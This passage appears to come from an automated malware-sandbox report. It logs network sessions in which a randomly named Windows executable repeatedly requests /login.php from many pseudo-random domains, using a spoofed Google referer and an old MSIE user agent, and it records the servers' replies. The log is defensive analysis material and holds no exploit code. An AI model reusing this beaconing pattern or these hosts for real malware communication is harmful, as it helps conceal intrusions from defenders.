Date: Mon, 11 Nov 2024 17:08:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d26b1bc4b9544e9356db55f438dfb4a0|66.23.206.109|1731344905|1731344858|23|2|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.9 | 62614 | 44.221.84.105 | 80 | 1812 | C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:25.504405975 CET | 352 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vocyzit.com
Cookie: snkz=66.23.206.109; btst=dfd3f50e4dee78c8f9b2b106904110df|66.23.206.109|1731344858|1731344858|0|1|0
Nov 11, 2024 18:08:25.964348078 CET | 335 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 17:08:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=dfd3f50e4dee78c8f9b2b106904110df|66.23.206.109|1731344905|1731344858|23|2|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.9 | 62617 | 178.162.203.211 | 80 | 1756 | C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:26.328807116 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.9 | 62615 | 3.94.10.34 | 80 | 1756 | C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:26.336595058 CET | 352 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lymyxid.com
Cookie: snkz=66.23.206.109; btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344858|1731344858|0|1|0
Nov 11, 2024 18:08:26.788459063 CET | 335 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 17:08:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344906|1731344858|24|2|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.9 | 62616 | 199.191.50.83 | 80 | 1756 | C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:26.340548038 CET | 279 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galyqaz.com
Cookie: vsid=910vr4788904590031611
Nov 11, 2024 18:08:28.500433922 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Nov 2024 17:08:26 GMT
Server: Apache
Referrer-Policy: no-referrer-when-downgrade
Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw==
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.9 | 62619 | 18.208.156.248 | 80 | 1756 | C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:26.358057976 CET | 352 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vonypom.com
                                                                                                                                                                                                            Cookie: snkz=66.23.206.109; btst=d26b1bc4b9544e9356db55f438dfb4a0|66.23.206.109|1731344858|1731344858|0|1|0
Nov 11, 2024 18:08:26.789223909 CET | 335 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:26 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=d26b1bc4b9544e9356db55f438dfb4a0|66.23.206.109|1731344906|1731344858|24|2|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
65 | 192.168.2.9 | 62618 | 154.212.231.82 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:26.358696938 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyniw.com
Nov 11, 2024 18:08:27.235456944 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:27 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.9 | 62620 | 23.253.46.64 | 80 | 1756 | C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:26.410521030 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyqah.com
Nov 11, 2024 18:08:26.819720984 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:21 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Nov 11, 2024 18:08:26.819760084 CET | 169 | IN
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.9 | 62623 | 44.221.84.105 | 80 | 1756 | C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:29.081897974 CET | 352 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qetyfuv.com
                                                                                                                                                                                                            Cookie: snkz=66.23.206.109; btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344858|1731344858|0|1|0
Nov 11, 2024 18:08:29.510899067 CET | 335 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:29 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344909|1731344858|25|2|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.9 | 62624 | 75.2.71.199 | 80 | 1756 | C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:29.106256962 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: puzylyp.com
Nov 11, 2024 18:08:29.523556948 CET | 166 | IN | HTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Location: https://puzylyp.com/login.php
                                                                                                                                                                                                            Server: Caddy
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:29 GMT
                                                                                                                                                                                                            Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.9 | 62625 | 199.59.243.227 | 80 | 1756 | C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:29.106554031 CET | 305 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vojyqem.com
                                                                                                                                                                                                            Cookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65
Nov 11, 2024 18:08:29.522852898 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:08:29 GMT
                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                            content-length: 1094
                                                                                                                                                                                                            x-request-id: fc5b29c8-0188-4bf7-8849-fa3bd61e138c
                                                                                                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                            set-cookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65; expires=Mon, 11 Nov 2024 17:23:29 GMT
                                                                                                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
Nov 11, 2024 18:08:29.522900105 CET | 520 | IN | Data Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65
                                                                                                                                                                                                            Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTVhODhlYTAtMzZhNy00ZTRlLThmNjAtNWQxMTM5YjFkZjY1IiwicGFnZV90aW1lIjoxNzMxMzQ0OTA5LCJwYWdlX3VybCI6Imh0dHA6L


Session ID | Source IP | Source Port | Destination IP | Destination Port
70 | 192.168.2.9 | 62626 | 44.221.84.105 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:29.106669903 CET | 352 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vocyzit.com
                                                                                                                                                                                                            Cookie: snkz=66.23.206.109; btst=dfd3f50e4dee78c8f9b2b106904110df|66.23.206.109|1731344858|1731344858|0|1|0
Nov 11, 2024 18:08:29.525649071 CET | 335 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:29 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=dfd3f50e4dee78c8f9b2b106904110df|66.23.206.109|1731344909|1731344858|25|2|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.9 | 62627 | 208.100.26.245 | 80 | 1756 | C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:29.106754065 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyvyxor.com
Nov 11, 2024 18:08:29.547198057 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:29 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.9 | 62628 | 188.114.96.3 | 80 | 1756 | C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:29.117264986 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
Nov 11, 2024 18:08:29.794085979 CET | 966 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:29 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://qegyhig.com/login.php
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VuX8b2fxJu6aId1g1ONlp2lCTJGkYDGyQKJXSFgNmds3zsjyjYXiz7HJkRBYUvfMTzk%2BG0fsf789Ozs%2BsfgE0lFie5HoYQexW5Tu2SuWv8K7dSAlNZzaG4XGKsoMWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe2745bdf4249-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1153&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                            Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.9 | 62634 | 23.253.46.64 | 80 | 1812 | C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:30.645968914 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyqah.com
Nov 11, 2024 18:08:31.100305080 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:25 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Nov 11, 2024 18:08:31.100322962 CET | 169 | IN
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.9 | 62638 | 75.2.71.199 | 80 | 3964 | C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:33.632031918 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: puzylyp.com
Nov 11, 2024 18:08:33.987322092 CET | 166 | IN | HTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Location: https://puzylyp.com/login.php
                                                                                                                                                                                                            Server: Caddy
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:33 GMT
                                                                                                                                                                                                            Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.9 | 62637 | 44.221.84.105 | 80 | 3964 | C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:33.632278919 CET | 353 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qetyfuv.com
                                                                                                                                                                                                            Cookie: snkz=66.23.206.109; btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344905|1731344858|23|2|0
Nov 11, 2024 18:08:33.983376980 CET | 335 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:33 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344913|1731344858|15|3|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
76 | 192.168.2.9 | 62644 | 44.221.84.105 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:33.897934914 CET | 353 | OUT | GET /login.php HTTP/1.1
